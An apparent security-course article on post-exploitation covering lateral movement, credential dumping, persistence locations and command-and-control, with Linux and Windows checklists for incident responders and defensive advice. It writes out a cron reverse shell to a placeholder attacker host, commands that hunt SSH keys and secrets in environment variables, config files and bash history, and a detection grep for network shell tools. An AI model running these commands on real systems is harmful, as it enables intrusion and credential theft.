Post-exploitation and persistence

Getting initial access is just the beginning. What happens next determines the impact of the breach: does the attacker get stopped at one compromised workstation, or do they take over the entire network? Post-exploitation covers everything from the first shell to full domain compromise: lateral movement, credential harvesting, establishing persistence, and maintaining command-and-control.

Prerequisites

You should understand exploitation basics, Linux privilege escalation, and Windows security fundamentals.

Lateral movement

After compromising one system, the attacker moves to others. The goal is to find higher-privilege accounts, sensitive data, and more systems to control.

Common techniques:

• Credential reuse: try the same credentials on other machines (many users reuse passwords)
• Pass-the-Hash: use captured NTLM hashes to authenticate on Windows machines
• SSH key theft: stolen SSH keys from ~/.ssh/ let you access other Linux systems
• Token impersonation: use another user’s security token on Windows
• Exploiting trust: domain trusts, SSH agent forwarding, shared credentials in config files

# On a compromised Linux host, check for SSH keys
find /home -name "id_rsa" -o -name "id_ed25519" 2>/dev/null

Output:

/home/deploy/.ssh/id_ed25519
/home/admin/.ssh/id_rsa

# Check SSH config for other hosts
cat /home/deploy/.ssh/config 2>/dev/null
cat /home/admin/.ssh/known_hosts 2>/dev/null | head -10

# Check for credentials in environment variables and config files
env | grep -iE "pass|key|secret|token"
find / -name ".env" -o -name "*.conf" 2>/dev/null | xargs grep -l "password" 2>/dev/null

Credential dumping concepts

Linux:

• /etc/shadow contains password hashes (requires root to read)
• Process memory can contain plaintext credentials for running services
• SSH keys in home directories
• Credentials in bash history: cat ~/.bash_history | grep -i "pass\|ssh\|mysql"

Windows:

• LSASS process memory contains cached credentials
• SAM database contains local account hashes
• Domain Controller’s NTDS.dit contains all domain hashes
• Cached credentials in the registry

Persistence mechanisms

Persistence is how the attacker ensures they maintain access even if:

• The compromised account’s password is changed
• The initial exploit is patched
• The system is rebooted
• The initial backdoor is discovered

Linux persistence locations

# 1. Cron jobs
crontab -l                           # User crontab
cat /etc/crontab                     # System crontab
ls /etc/cron.d/                      # Drop-in cron jobs
ls /etc/cron.daily/                  # Daily scripts

An attacker might add:

# Reverse shell every minute
* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'

# 2. SSH authorized_keys
cat /root/.ssh/authorized_keys       # Attacker adds their public key
cat /home/*/.ssh/authorized_keys

# 3. Systemd services
ls /etc/systemd/system/              # Custom service files
ls /home/*/.config/systemd/user/     # User-level services

# 4. Shell profile scripts
cat /etc/profile                     # Runs for all users on login
cat /home/*/.bashrc                  # Runs for specific user
cat /home/*/.bash_profile

# 5. LD_PRELOAD
cat /etc/ld.so.preload               # Loaded before any program

Windows persistence locations

• Registry Run keys: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• Scheduled Tasks: like cron on Linux
• Services: create a new Windows service
• WMI event subscriptions: trigger on system events
• DLL hijacking: place malicious DLLs in paths searched before the legitimate one
• Golden Ticket: forged Kerberos tickets (see Windows fundamentals)

Example 1: Common persistence locations on Linux and Windows

Here is a checklist for incident responders, showing what to look for:

Linux persistence checklist:

# Check all cron locations
echo "=== User crontabs ==="
for user in $(cut -d: -f1 /etc/passwd); do
    crontab -l -u "$user" 2>/dev/null && echo "  ^ User: $user"
done

echo "=== System cron ==="
cat /etc/crontab
ls -la /etc/cron.d/

echo "=== SSH authorized keys ==="
find / -name "authorized_keys" -exec echo "File: {}" \; -exec cat {} \; 2>/dev/null

echo "=== Systemd services (non-default) ==="
systemctl list-unit-files --type=service --state=enabled | grep -v "systemd\|dbus\|ssh\|cron\|rsyslog\|ufw"

echo "=== Shell profiles (check for suspicious commands) ==="
grep -r "curl\|wget\|nc\|ncat\|/dev/tcp" /etc/profile* /home/*/.bash* /root/.bash* 2>/dev/null

echo "=== LD preload ==="
cat /etc/ld.so.preload 2>/dev/null

echo "=== Unusual SUID binaries (compared to a clean system) ==="
find / -perm -4000 -type f 2>/dev/null | sort

Windows persistence checklist (conceptual):

Location	Command to check
Run keys	reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Scheduled tasks	schtasks /query /fo LIST /v
Services	sc query type= all state= all
Startup folder	dir "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup"
WMI subscriptions	Get-WMIObject -Namespace root\Subscription -Class __EventConsumer

Command and control (C2) channels

The attacker needs a way to send commands to the compromised system and receive data back. This communication channel is called C2.

Common C2 methods:

Method	Description	Detection difficulty
HTTP/HTTPS	Disguised as normal web traffic	Medium
DNS tunneling	Commands encoded in DNS queries	Hard
Social media	Commands posted on Twitter/Pastebin	Hard
Cloud services	Using Slack, Discord, or cloud storage APIs	Hard
Raw TCP/UDP	Direct connection to attacker’s server	Easy
ICMP tunneling	Data hidden in ping packets	Medium

The trend is toward encrypted C2 over HTTPS, which blends with normal web traffic and is hard to distinguish from legitimate browsing.

Example 2: What to look for on each platform

Network indicators of C2:

# Unusual outbound connections
ss -tnp | grep ESTAB | awk '{print $5}' | sort | uniq -c | sort -rn | head -20

# DNS queries to unusual domains (high entropy = potential tunneling)
# Check DNS logs or use tcpdump
sudo tcpdump -i eth0 port 53 -n 2>/dev/null | head -20

# Connections to known-bad IPs (check against threat intel feeds)
ss -tnp | grep ESTAB

File system indicators:

# Recently created files in unusual locations
find /tmp /var/tmp /dev/shm -type f -mtime -7 2>/dev/null

# Hidden files and directories
find / -name ".*" -type f -mtime -30 2>/dev/null | grep -v "/\.\(git\|cache\|config\|local\)"

# Files with execution permissions in temp directories
find /tmp /var/tmp -perm -111 -type f 2>/dev/null

Process indicators:

# Processes running from unusual locations
ps aux | grep -E "/tmp|/dev/shm|/var/tmp"

# Processes with no associated binary on disk
ls -la /proc/*/exe 2>/dev/null | grep "(deleted)"

# Unusual parent-child process relationships
ps auxf | grep -E "bash|sh|python|perl|ruby" | grep -v grep

Defense: detecting and disrupting post-exploitation

1. Network segmentation: limit lateral movement by isolating systems (see network attacks)
2. Endpoint Detection and Response (EDR): monitor process creation, file changes, and network connections on every endpoint
3. Log aggregation: centralize logs so the attacker cannot simply delete them on the compromised host
4. Credential management: rotate credentials regularly, use unique passwords per system, implement MFA
5. File integrity monitoring: detect changes to critical files (permissions, configs, binaries)
6. Network monitoring: baseline normal traffic and alert on anomalies

What comes next

The next article covers Defensive security: hardening and monitoring, where you will learn about CIS benchmarks, SIEM systems, and detection engineering.

For the response process when you discover a compromise, see Incident response.